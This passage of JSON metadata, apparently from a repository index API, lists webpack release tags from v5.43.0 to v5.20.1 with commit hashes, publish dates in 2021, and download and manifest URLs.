s/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.g